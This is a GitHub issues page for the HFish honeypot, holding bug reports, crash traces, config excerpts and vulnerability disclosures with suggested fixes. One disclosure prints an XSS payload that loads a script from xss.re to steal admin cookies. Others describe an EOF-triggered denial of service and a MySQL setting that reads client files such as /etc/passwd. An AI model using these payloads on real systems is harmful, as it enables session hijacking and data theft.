hfish's People

Contributors

cainiao329, cheungchan, germey, my417, pickled-pepper, qilei-booker, sanshuijun, sunxiaoshen-booker, waterwei, wwk927, yklydxtt

hfish's Issues

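The honeypot system is intuitive and clean; reporting two issues with version 0.5.1

1. Email sending does not work
Message: [GIN] 2020/03/10 - 16:18:30 | 200 | 425.828µs | 10.32.166.24 | GET /get/setting/info?id=1
[HFish] 127.0.0.1 - [2020-03-10 16:18:42] 发送邮件通知失败 [EOF]
2. The client connects normally and works normally, and the hooked list has entries, but the distributed list shows no information.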

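Suggest adding a report feature

Suggest adding a report feature, for example importing IP addresses with their corresponding regions; and if the brute-forced passwords are somewhat complex, being able to export a password dictionary.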

the client name can XSS

20200226213922
Modify the client config.ini file in a distributed cluster where the client name constructs an XSS statement to attack the server

[rpc]
status = 2 # Mode: 0 off, 1 server, 2 client
addr = x.x.x.x:7879 # RPC server address or client address
name = < img src=x onerror=alert(1)> # Status 1: server name; status 2: client name

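Some display bugs in the admin backend page

I set the SSH honeypot to high-interaction mode (status set to 2 in the config file),
and then found that the service status in the backend shows SSH as off, as in the image below:
V9Wx.jpg
After testing, I found that only when status is set to 1 does the backend service status not show it as off (there is a small red dot).
Although it is not really a functional bug, I am mentioning it anyway; I hope it gets fixed soon.

Also, the pie chart of attacking IPs in the backend overflows once there are many IPs, so it is not fully displayed; I hope there can be some optimization (for example, listing only the IP addresses with many attacks).
VR4H.jpg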

Exited abnormally after startup

The error message is as follows

redis  231
更新数据失败
panic: database is locked

goroutine 296 [running]:
HFish/error.Check(...)
	/root/go/HFish/error/error.go:11
HFish/core/dbUtil.Update(0xccbb17, 0x32, 0xc0000a1f90, 0x2, 0x2, 0x0)
	/root/go/HFish/core/dbUtil/dbUtil.go:89 +0x338
HFish/core/report.ReportUpdateRedis(0xc0001a91eb, 0x3, 0xc00024a980, 0xb)
	/root/go/HFish/core/report/report.go:249 +0x109
created by HFish/core/protocol/redis.handleConnection.func5
	/root/go/HFish/core/protocol/redis/redis.go:112 +0x23e

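Small logic bug in the web honeypot

The honeypot records data by calling JS. When we have changed the API address and key value, one only needs to find the JS that is called in the HTML page to find these two values.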

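Some suggestions

Environment: releases 0.5.1 + MySQL mode
Suggestions:
1. Geolocation information could have a setting to enable or disable it;
2. Do not record geolocation information repeatedly for the same IP, to reduce database size; ideally record locations in a separate table, referenced by ID;
3. The SSH high-interaction mode parameter configuration could use variables;
4. Record duplicate account/password pairs in hfish_passwd only once, to reduce database size;
5. For project_name in hfish_info, ideally define the names in a separate table, referenced by ID, to reduce database size;
6. The API could add some query parameters, e.g. a time range for the blacklist API and a top-N query for the password API.
I am a newbie; it has been comfortable to use so far, I have starred it, and I hope the maintainers can keep maintaining it.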

SSH reports an error when password information is included

更新上钩信息失败 [Error 1267: Illegal mix of collations (utf8mb4_general_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation 'concat']

Startup error on Windows

[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.

  • using env: export GIN_MODE=release
  • using code: gin.SetMode(gin.ReleaseMode)

[GIN-debug] Loaded HTML Templates (2):
-
- index.html

[GIN-debug] GET /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] HEAD /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] GET / --> HFish/utils/setting.RunDeep.func1 (2 handlers)
[GIN-debug] POST /api/v1/post/deep_report --> HFish/view/api.ReportDeepWeb (3 handlers)
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.

  • using env: export GIN_MODE=release
  • using code: gin.SetMode(gin.ReleaseMode)

[GIN-debug] POST /api/v1/post/plug_report --> HFish/view/api.ReportPlugWeb (3 handlers)
panic: interface conversion: interface {} is nil, not int64

goroutine 1 [running]:
HFish/utils/setting.initCahe()
/ext-go/1/src/HFish/utils/setting/setting.go:159 +0xcec
HFish/utils/setting.Run()
/ext-go/1/src/HFish/utils/setting/setting.go:392 +0xf00
main.main()
/ext-go/1/src/HFish/main.go:22 +0x1c3

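About running in the background

I start this honeypot over SSH; how can I keep it running in the background so that it stays online after I exit SSH?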

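Hooked list does not record the source IP

The telnet, memcache and redis honeypots sometimes have hooked records whose source IP is empty:
image
Looking at the record details, some of them are partial HTTP header information:
image
There are also cases where the record information is empty or is other garbled information.
I don't know what is going on here; if you need other information, please reply.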

Panics and exits abnormally after running for a while

Version: v0.3

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x38 pc=0x9bc1d0]

goroutine 11364 [running]:
sync.(*RWMutex).RLock(...)
/usr/local/go/src/sync/rwmutex.go:48
database/sql.(*Stmt).ExecContext(0x0, 0xddfbe0, 0xc000094020, 0xc00379bf90, 0x2, 0x2, 0x0, 0x0, 0x0, 0x0)
/usr/local/go/src/database/sql/sql.go:2307 +0x50
database/sql.(*Stmt).Exec(...)
/usr/local/go/src/database/sql/sql.go:2336
HFish/core/dbUtil.Update(0xcca995, 0x32, 0xc00379bf90, 0x2, 0x2, 0x0)
/ext-go/1/src/HFish/core/dbUtil/dbUtil.go:87 +0xd9
HFish/core/report.ReportUpdateSSH(0xc0002da0d4, 0x4, 0xcaa51c, 0x2)
/ext-go/1/src/HFish/core/report/report.go:227 +0x109
created by HFish/core/protocol/ssh.Start.func1
/ext-go/1/src/HFish/core/protocol/ssh/ssh.go:59 +0x5b4

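Small suggestions

How about adding a raw log export feature to the backend, so the logs can be used for other analysis?
For things like SSH and FTP, a password collection feature could be added, to gather a dictionary.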

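About the cache write error

github.com/panjf2000/ants v1.2.0 fails to download with go mod download; it succeeds after upgrading to 1.3.0; but running the code reports an error, details as follows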

[GIN-debug] POST /api/v1/post/plug_report --> HFish/view/api.ReportPlugWeb (3 handlers)
panic: interface conversion: interface {} is nil, not int64

goroutine 1 [running]:
HFish/utils/setting.initCahe()
E:/GoProject/src/HFish-0.5/utils/setting/setting.go:155 +0x846
HFish/utils/setting.Run()
E:/GoProject/src/HFish-0.5/utils/setting/setting.go:369 +0xec0
main.main()
E:/GoProject/src/HFish-0.5/main.go:10 +0x2d
exit status 2

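SSH service enters an infinite loop when EOF is typed while reading command-line input

Summary

The honeypot's SSH service does no error handling when accepting the user's terminal input, so when the attacker types Ctrl+D (EOF)

line, _ = term.ReadLine()

throws an error, but the loop does not end, which causes an infinite loop that endlessly executes

if is.Rpc() {
	id = client.ReportResult("SSH", "", arr[0], info, "0")
} else {
	id = strconv.FormatInt(report.ReportSSH(arr[0], "本机", info), 10)
}

This causes a DDOS, making the honeypot server deny service, and generates a large amount of junk data in the database.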
image
image

Test environment

macOS Catalina 10.15.3
go1.13.4 darwin/amd64

Suggested fix

Add error handling for term.ReadLine(), as follows:

if err != nil {
	break
}
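
The loop described in the issue above, next to a version that stops on a read error, as an added example that is not HFish's own code. The `lineReader` interface, `fakeTerm`, `recorder` and the iteration limits are assumptions made so it runs without an SSH dependency; the fixed loop also goes beyond the suggested `break` by capping reads per session.

```go
package main

import (
	"errors"
	"fmt"
	"io"
)

// lineReader is the part of a terminal the session loop needs. It mirrors the
// ReadLine() (string, error) shape used in the issue; the interface itself is
// an assumption of this example.
type lineReader interface {
	ReadLine() (string, error)
}

// fakeTerm replays constructed input, then returns io.EOF on every further
// call, as a terminal does once the peer has sent Ctrl+D or disconnected.
type fakeTerm struct {
	lines []string
	next  int
}

func (t *fakeTerm) ReadLine() (string, error) {
	if t.next >= len(t.lines) {
		return "", io.EOF
	}
	line := t.lines[t.next]
	t.next++
	return line, nil
}

// recorder stands in for the report/database layer and keeps the stored rows.
type recorder struct{ rows []string }

func (r *recorder) report(cmd string) { r.rows = append(r.rows, cmd) }

var errSessionLimit = errors.New("per-session read limit reached")

// sessionIgnoringError reproduces the reported pattern: the error is dropped,
// so after EOF every iteration stores another empty record. maxIter exists
// only so the demonstration terminates; the loop in the issue has no bound.
func sessionIgnoringError(t lineReader, r *recorder, maxIter int) {
	for i := 0; i < maxIter; i++ {
		line, _ := t.ReadLine()
		r.report(line)
	}
}

// sessionChecked ends the session on any read error, skips empty lines, and
// caps the number of reads so one connection cannot fill the database.
// It returns nil when the peer closed its input normally.
func sessionChecked(t lineReader, r *recorder, maxReads int) error {
	for i := 0; i < maxReads; i++ {
		line, err := t.ReadLine()
		if errors.Is(err, io.EOF) {
			return nil // Ctrl+D or disconnect: stop reading
		}
		if err != nil {
			return fmt.Errorf("read line: %w", err)
		}
		if line != "" {
			r.report(line)
		}
	}
	return errSessionLimit
}

func main() {
	input := []string{"whoami", "uname -a"} // constructed session input
	bad, good := &recorder{}, &recorder{}
	sessionIgnoringError(&fakeTerm{lines: input}, bad, 1000)
	err := sessionChecked(&fakeTerm{lines: input}, good, 1000)
	fmt.Printf("ignoring error: %d rows; checked: %d rows, err=%v\n",
		len(bad.rows), len(good.rows), err)
}
```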

Error when running as the server on Windows

An error occurs when attempting an FTP connection

panic: runtime error: invalid memory address or nil pointer dereference
[signal 0xc0000005 code=0x0 addr=0x0 pc=0xa52d9e]

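About IPv6

Environment: releases 0.6 + MySQL mode
When the cluster connects over IPv6, the cluster list cannot display the IP correctly, and the hooked list probably cannot display the IP correctly either.
Suggest adding support for this, thanks.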

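The honeypot's SSH feature will not start

Hello, with the latest version, the honeypot's SSH will not start no matter what. I tried both the Docker container and the binary, and in both cases SSH does not work while everything else is OK. On the host I tried both changing the sshd port and stopping the sshd service. Could you take a look at what is going on?

Environment:

The system is a clean minimal install of CentOS 7, with SELinux disabled and firewalld turned off

Config file: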

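[root@hello HFish-0.3-linux-amd64]# cat config.ini
[rpc]
status = 0                                   # Mode: 0 off, 1 server, 2 client
addr = 127.0.0.1:7879                        # RPC server address or client address
name = Server                                # Status 1: server name; status 2: client name

[admin]                                      # When RPC status is 2 (cluster client), admin can be deleted
addr = 0.0.0.0:9001                        # Admin backend listen address
account = admin                              # Login account
password = admin                             # Login password

[api]
status = 0                                   # Whether to start the API: 0 off, 1 on
web_url = /api/v1/post/report                # Web honeypot report API
deep_url = /api/v1/post/deep_report          # Dark web honeypot report API
plug_url = /api/v1/post/plug_report          # Plugin honeypot report API
sec_key = 9cbf8a4dcb8e30682b927f352d6559a0   # API authentication key

[plug]
status = 0                                   # Whether to start the honeypot plugin: 0 off, 1 on; the API must be started first
addr = 0.0.0.0:8989                          # Honeypot plugin listen address

[web]
status = 1                                   # Whether to start WEB: 1 on, 0 off; WEB can report results only after the API is started
addr = 0.0.0.0:80                          # WEB listen address; 0.0.0.0 is open externally, 127.0.0.1 is internal only and can go through an Nginx reverse proxy
template = wordPress/html                    # WEB template path
index = index.html                           # WEB home page file
static = wordPress/static                    # WEB static file path. Note: two directories must exist; the html files and static files cannot be at the same level
url = /                                      # WEB access path, default /; can be changed to index.html index.asp index.php

[deep]
status = 1                                   # Whether to start the dark web honeypot: 1 on, 0 off; results can be reported only after the API is started
addr = 0.0.0.0:8080                          # Dark web WEB listen address
template = deep/html                         # Dark web WEB template path
index = index.html                           # Dark web WEB home page file
static = deep/static                         # Dark web WEB static file path. Note: two directories must exist; the html files and static files cannot be at the same level
url = /                                      # Dark web WEB access path, default /; can be changed to index.html index.asp index.php

[ssh]
status = 2                                   # Whether to start SSH: 0 off, 1 low interaction, 2 high interaction
addr = 0.0.0.0:22                            # SSH server address. Mind port conflicts: first stop the server's openssh service or change its port

[redis]
status = 1                                   # Whether to start Redis: 0 off, 1 on
addr = 0.0.0.0:6379                          # Redis server address, mind port conflicts

[mysql]
status = 1                                   # Whether to start Mysql: 0 off, 1 on
addr = 0.0.0.0:3306                          # Mysql server address, mind port conflicts
files = /etc/passwd,/etc/group               # Mysql server reads arbitrary files from the client; separate multiple entries with commas, one is picked at random

[telnet]
status = 1                                   # Whether to start Telnet: 0 off, 1 on
addr = 0.0.0.0:23                            # Telnet server address, mind port conflicts

[ftp]
status = 1                                   # Whether to start Ftp: 0 off, 1 on
addr = 0.0.0.0:21                            # Ftp server address, mind port conflicts

[mem_cache]
status = 1                                   # Whether to start MemCache: 0 off, 1 on
addr = 0.0.0.0:11211                         # Memcache server address, mind port conflicts
rate_limit = 4                               # Responses per second
[root@hello HFish-0.3-linux-amd64]#

Startup log: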

[root@hello HFish-0.3-linux-amd64]# ./HFish run                                                                                                   
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.                                                            
 - using env:   export GIN_MODE=release                                                                                                           
 - using code:  gin.SetMode(gin.ReleaseMode)                                                                                                      
                                                                                                                                                  
2019/09/05 15:38:03 [Memcache TCP] Listning on 0.0.0.0:11211                                                                                      
[GIN-debug] Loaded HTML Templates (2):                                                                                                            
        -                                                                                                                                         
        - index.html                                                                                                                              
                                                                                                                                                  
[GIN-debug] GET    /static/*filepath         --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)      
[GIN-debug] HEAD   /static/*filepath         --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)      
[GIN-debug] GET    /                         --> HFish/utils/setting.RunWeb.func1 (2 handlers)                                                    
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.                                                            
 - using env:   export GIN_MODE=release                                                                                                           
 - using code:  gin.SetMode(gin.ReleaseMode)                                                                                                      
                                                                                                                                                  
[GIN-debug] Loaded HTML Templates (2):                                                                                                            
        -                                                                                                                                         
        - index.html                                                                                                                              
                                                                                                                                                  
[GIN-debug] GET    /static/*filepath         --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)      
[GIN-debug] HEAD   /static/*filepath         --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)      
[GIN-debug] GET    /                         --> HFish/utils/setting.RunDeep.func1 (2 handlers)                                                   
[GIN-debug] [WARNING] Creating an Engine instance with the Logger and Recovery middleware already attached.                                       
                                                                                                                                                  
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.                                                            
 - using env:   export GIN_MODE=release                                                                                                           
 - using code:  gin.SetMode(gin.ReleaseMode)                                                                                                      
                                                                                                                                                  
[GIN-debug] Loaded HTML Templates (11):                                                                                                           
        - colony.html                                                                                                                             
        - footer.html                                                                                                                             
        - footer                                                                                                                                  
        - header                                                                                                                                  
        - login.html                                                                                                                              
        - mail.html                                                                                                                               
        -                                                                                                                                         
        - dashboard.html                                                                                                                          
        - fish.html                                                                                                                               
        - header.html                                                                                                                             
        - setting.html                                                                                                                            
                                                                                                                                                  
[GIN-debug] GET    /static/*filepath         --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (5 handlers)      
[GIN-debug] HEAD   /static/*filepath         --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (5 handlers)      
[GIN-debug] GET    /login                    --> HFish/view/login.Html (5 handlers)                                                               
[GIN-debug] POST   /login                    --> HFish/view/login.Login (5 handlers)                                                              
[GIN-debug] GET    /logout                   --> HFish/view/login.Logout (5 handlers)                                                             
[GIN-debug] GET    /                         --> HFish/view/dashboard.Html (6 handlers)                                                           
[GIN-debug] GET    /dashboard                --> HFish/view/dashboard.Html (6 handlers)                                                           
[GIN-debug] GET    /get/dashboard/data       --> HFish/view/dashboard.GetFishData (6 handlers)                                                    
[GIN-debug] GET    /get/dashboard/pie_data   --> HFish/view/dashboard.GetFishPieData (6 handlers)                                                 
[GIN-debug] GET    /fish                     --> HFish/view/fish.Html (6 handlers)                                                                
[GIN-debug] GET    /get/fish/list            --> HFish/view/fish.GetFishList (6 handlers)                                                         
[GIN-debug] GET    /get/fish/info            --> HFish/view/fish.GetFishInfo (6 handlers)                                                         
[GIN-debug] GET    /get/fish/typeList        --> HFish/view/fish.GetFishTypeInfo (6 handlers)                                                     
[GIN-debug] POST   /post/fish/del            --> HFish/view/fish.PostFishDel (6 handlers)                                                         
[GIN-debug] GET    /colony                   --> HFish/view/colony.Html (6 handlers)                                                              
[GIN-debug] GET    /get/colony/list          --> HFish/view/colony.GetColony (6 handlers)                                                         
[GIN-debug] POST   /post/colony/del          --> HFish/view/colony.PostColonyDel (6 handlers)                                                     
[GIN-debug] GET    /mail                     --> HFish/view/mail.Html (6 handlers)                                                                
[GIN-debug] POST   /post/mail/sendEmail      --> HFish/view/mail.SendEmailToUsers (6 handlers)                                                    
[GIN-debug] GET    /setting                  --> HFish/view/setting.Html (6 handlers)                                                             
[GIN-debug] GET    /get/setting/info         --> HFish/view/setting.GetSettingInfo (6 handlers)                                                   
[GIN-debug] POST   /post/setting/update      --> HFish/view/setting.UpdateEmailInfo (6 handlers)                                                  
[GIN-debug] POST   /post/setting/updateAlertMail --> HFish/view/setting.UpdateAlertMail (6 handlers)                                              
[GIN-debug] POST   /post/setting/checkSetting --> HFish/view/setting.UpdateStatusSetting (6 handlers)                                             
[GIN-debug] POST   /post/setting/updateWebHook --> HFish/view/setting.UpdateWebHook (6 handlers)                                                  
[GIN-debug] POST   /post/setting/updateWhiteIp --> HFish/view/setting.UpdateWhiteIp (6 handlers)                                                  
[GIN-debug] GET    /api/v1/get/ip            --> HFish/view/api.GetIpList (6 handlers)                                                            
[GIN-debug] GET    /api/v1/get/fish_info     --> HFish/view/api.GetFishInfo (6 handlers)                                                          

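Running, as shown in the image:
image

I think it was about a month ago that I tested it on another VPS of mine and it worked; I don't know which version that was. This time I used the latest version and did not test older versions.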

Webhook call succeeded, but no notification was delivered to WeChat

tail: hfish.log: file truncated
[HFish] 127.0.0.1 - [2020-03-11 16:21:28] WebHook 调用成功 []
[HFish] 127.0.0.1 - [2020-03-11 16:21:30] WebHook 调用成功 []
[HFish] 127.0.0.1 - [2020-03-11 16:21:31] WebHook 调用成功 []
[HFish] 127.0.0.1 - [2020-03-11 16:21:32] WebHook 调用成功 []
[HFish] 127.0.0.1 - [2020-03-11 16:21:50] WebHook 调用成功 []

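Directory is empty after mapping only config.ini in Docker?

Hi, sorry to bother you. After building with Docker, I did not map the whole directory like /hfish/:/opt/HFish/, but mapped only /hfish/config.ini:/opt/HFish/config.ini. It seems that this way, after Docker starts, it reports ./HFish not found, which means the directory was emptied. I hope to get a reply.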

Failed to open the config file

打开配置文件失败 [open ./config.ini: no such file or directory]
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x58 pc=0xa2046e]

Downloaded HFish-0.6.3-linux-amd64.tar.gz
cd HFish-0.6.3-linux-amd64
./HFish run

Docker with Web Api ERROR!

hi! hacklcx!!! When I simulated the process of using docker to build HFish quickly in a public network server, I found unexpected problems with JS in the WEB project.

docker exec -it hfish /bin/sh
cat config.ini
[api]
status = 1                                   # Whether to start the API: 1 on, 0 off
web_url = /api/v1/post/report                # Admin backend listen address
deep_url = /api/v1/post/deep_report          # Admin backend listen address

Then the error shows that:

cat x.js 
function report() {
    var login_field = $("#user_login").val();
    var password = $("#user_pass").val();

    $.ajax({
        type: "POST",
        url: "http://localhost:9001/api/v1/post/dart_report",

In branch dev, deep_report = dart_report, so the API for dart_report is not found.

But the problem has been fixed in branch master

I recommend using master to build docker image

Is the purpose to be more realistic?

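If you want connections from outside to feel more realistic, a small random delay should be added when the connection is first made. For example: time.Sleep(time.Millisecond * time.Duration(rand.Intn(300)))
The above comes from a bit of experience in actual use.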

If you want to make the connection more realistic, there should be a little delay, random delay. Now the result's returning too fast.
This is the experience from actual use.

XSS exists in the information, can get cookie

In any phishing interface, where the password needs to be entered, the use of img tags can cause XSS attacks.

Insert XSS payload where the password is entered
image
XSS code is triggered when the administrator views the information
image
Use the following code to get a cookie.
<img src=a onerror=with(document)body.appendChild(document.createElement('script')).src="//xss.re/974" height="0" width="0">
image

Crashes immediately on startup

Crashes immediately on startup. Runtime environment: 2 cores, 2 GB, CentOS 7, version 0.3.2 run as a binary
2019/10/11 13:22:34 worker exits from a panic: runtime error: invalid memory address or nil pointer dereference
2019/10/11 13:22:34 worker exits from a panic: runtime error: invalid memory address or nil pointer dereference
2019/10/11 13:22:34 worker exits from panic: goroutine 68 [running]:
HFish/vendor/github.com/panjf2000/ants.(*Worker).run.func1.1(0xc0005fd650)
/ext-go/1/src/HFish/vendor/github.com/panjf2000/ants/worker.go:59 +0x13e
panic(0xc571c0, 0x15d8330)
/usr/local/go/src/runtime/panic.go:522 +0x1b5
HFish/core/protocol/mysql.Start.func1()
/ext-go/1/src/HFish/core/protocol/mysql/mysql.go:66 +0x12e
HFish/vendor/github.com/panjf2000/ants.(*Worker).run.func1(0xc0005fd650)
/ext-go/1/src/HFish/vendor/github.com/panjf2000/ants/worker.go:71 +0x9b
created by HFish/vendor/github.com/panjf2000/ants.(*Worker).run
/ext-go/1/src/HFish/vendor/github.com/panjf2000/ants/worker.go:49 +0x4d

report xss

The name parameter in the request reported by the web honeypot's static/x.js has an XSS issue.
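
The three XSS reports on this page (cluster client name, password field, and the name parameter from x.js) share one cause: attacker-supplied strings rendered into the admin page as markup. The added example below, which is not HFish's own code, contrasts string concatenation with Go's html/template for one table row; the `hookRecord` struct, its fields and the function names are hypothetical.

```go
package main

import (
	"bytes"
	"fmt"
	"html/template"
	"strings"
)

// hookRecord holds fields that arrive from untrusted parties: the cluster
// client name from config.ini and the credentials typed into a lure page.
// The struct and its field names are hypothetical.
type hookRecord struct {
	Client   string
	Account  string
	Password string
}

// renderUnsafe builds the row by string concatenation, so markup in any field
// reaches the administrator's browser as markup.
func renderUnsafe(r hookRecord) string {
	return "<tr><td>" + r.Client + "</td><td>" + r.Account +
		"</td><td>" + r.Password + "</td></tr>"
}

// rowTmpl uses html/template, which escapes every value according to the
// HTML context it is inserted into (element text here).
var rowTmpl = template.Must(template.New("row").Parse(
	`<tr><td>{{.Client}}</td><td>{{.Account}}</td><td>{{.Password}}</td></tr>`))

// renderSafe renders the same row through the escaping template.
func renderSafe(r hookRecord) (string, error) {
	var buf bytes.Buffer
	if err := rowTmpl.Execute(&buf, r); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// containsLiveTag reports whether the output still carries an unescaped <img.
func containsLiveTag(htmlOut string) bool {
	return strings.Contains(strings.ToLower(htmlOut), "<img")
}

func main() {
	// Constructed record using the test string quoted in the first report.
	rec := hookRecord{
		Client:   "<img src=x onerror=alert(1)>",
		Account:  "root",
		Password: "<img src=x onerror=alert(1)>",
	}
	safe, err := renderSafe(rec)
	if err != nil {
		fmt.Println("render error:", err)
		return
	}
	fmt.Println("concatenated row keeps live tag:", containsLiveTag(renderUnsafe(rec)))
	fmt.Println("template row keeps live tag:   ", containsLiveTag(safe))
	fmt.Println(safe)
}
```

Marking the admin session cookie HttpOnly limits what a missed escape can read, but escaping at render time is the fix.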
